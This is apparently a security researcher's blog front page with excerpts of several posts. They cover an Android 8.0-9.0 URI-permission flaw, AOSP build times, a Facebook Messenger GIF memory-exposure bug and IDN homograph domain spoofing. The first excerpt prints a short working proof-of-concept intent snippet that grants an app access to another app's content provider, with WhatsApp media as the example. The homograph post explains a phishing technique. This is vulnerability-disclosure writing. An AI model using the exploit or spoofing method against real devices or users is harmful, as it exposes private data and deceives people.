Posts

Featured Post

Global grant uri in Android 8.0-9.0 (2018 year)

Image
Any thirdparty application was able to grant read/write access to any exported/non exported, secured by permissions content providers which were installed in system. It did't matter if content provider defined in AndroidManifest with grantUriPermission flag or not, if it was exported or no. Thirdparty were able to access any content provider in system without user interaction.

Uri uri =Uri.parse("content://com.whatsapp.provider.media/item/5");
Intent intent = new Intent(Intent.ACTION_MAIN);
intent.setClassName(getPackageName(), MainActivity.class.getName());
intent.addFlags(Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
intent.putExtra(Intent.EXTRA_STREAM, uri);
intent.setType("*/*");
startActivity(intent);
And that's all :) When you launch that code on vulnerable Android your app receives access to passed "uri" value. You can opened any conten…

AOSP build time on Ryzen 9 3900x

Probably somebody thinks to make his own build machine for Android. In the end of 2019 I bought next desktop PC:

Hardware:
AMD Ryzen 9 3900X
Gigabyte X570 Aorus Elite
HyperX Predator 2x16GB DDR4 PC4-25600 HX432C16PB3K2/32
Gigabyte Aorus NVMe Gen4 1TB GP-ASM2NE6100TTTD
Palit GeForce GT 1030 2GB DDR4

OS
Ubuntu 18.04.3

And here is some of build time logs

RAM: 2400mhz
make -j12
#### build completed successfully (54:13 (mm:ss)) ####

RAM: 2400mhz
-j18
#### build completed successfully (46:52 (mm:ss)) ####

RAM: 2400mhz
make -j24
#### build completed successfully (43:14 (mm:ss)) ####

RAM: 3200mhz
-j24
#### build completed successfully (41:55 (mm:ss)) ####

branch with tag
android-10.0.0_r_xx (don't remember android tag name))

Facebook Messenger server random memory exposure through corrupted GIF image

Image
Intro Year ago, in February 2018, I was testing Facebook Messenger for Android looking how it works with corrupted GIF images. I was inspired by Imagemagick "uninitialized memory disclosure in gif coder" bug and PoC called "gifoeb" (cool name for russian speakers). I found Messenger app only crashes with images generated by "gifoeb" tool with Nullpointer dereferrence (Facebook did't awarded bounty for DoS in Facebook Messenger for Android). Ok. I thought: what is GIF image format and how it looks, how I can generate my own image? (spoiler: 10K$ bug in Facebook Messenger for Web, but theory first)

Homograph attack on domains with K

Image
Internationalized domain name (IDN) homograph attack is way a thirdparty may confuse users exploiting the fact that many characters may look alike. For example urls "https://bank.com" and "https://bаnk.com" are look as the same, but actually first url contains latin "a", the second cyrilic "а" which looks alike latin.  This characters are called "homoglyphs". You may find more homoglyphs at http://www.irongeek.com/homoglyph-attack-generator.php .

IDN can be represented as unicode url or punycode.

Basically you can't register domain names with homoglyphs. Try to register "bаnk.com" and request will be rejected, because this name contains cyrilic "а". IDN registration policy  not allow to mix latin and cyrilic letters. More details about restrictions you can find here and at iana.org.


In IDN latin table (which represent permitted code points (letters) allowed for Internationalised Domain Name registrations) exis…